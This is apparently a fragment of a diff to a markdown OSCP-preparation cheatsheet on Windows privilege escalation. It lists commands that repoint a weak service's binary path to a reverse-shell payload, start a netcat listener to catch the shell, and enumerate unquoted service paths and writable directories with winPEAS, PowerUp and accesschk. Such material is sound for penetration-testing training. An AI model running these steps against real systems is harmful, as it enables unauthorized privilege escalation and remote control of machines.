airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Full Guide (Enumeration to Priv Escalation).md

 7.  `sc query <SERVICENAME>` check the current status of the service.
 8.  `sc config <SERVICENAME> binpath="\"C:\PrivEsc\reverse.exe\""` set the binary path to the location of the revershell payload.
 9. Start a netcat listener and `net start <SERVICENAME>`
+10.
  ### Unquoted Service Path
  0. `.\winPeas.exe quiet servicesinfo` Look for No quotes and Space detected in winpeas
  1. `Get-UnquotedService` (PowerUp) or `wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """`\
- 2. `.\accesschk.exe /accepteula -uwcqv user <SERVICENAME>` check permission if we can start the service.
+ 2. `.\accesschk.exe /accepteula -uwcqv user <SERVICENAME>` check permission if we can restart the service.
  3. Use accesschk.exe to check for write permissions in each binary path (if BUILTIN/user can write, we should write it in that path)
   ```
   > .\accesschk.exe /accepteula -uwdq C:\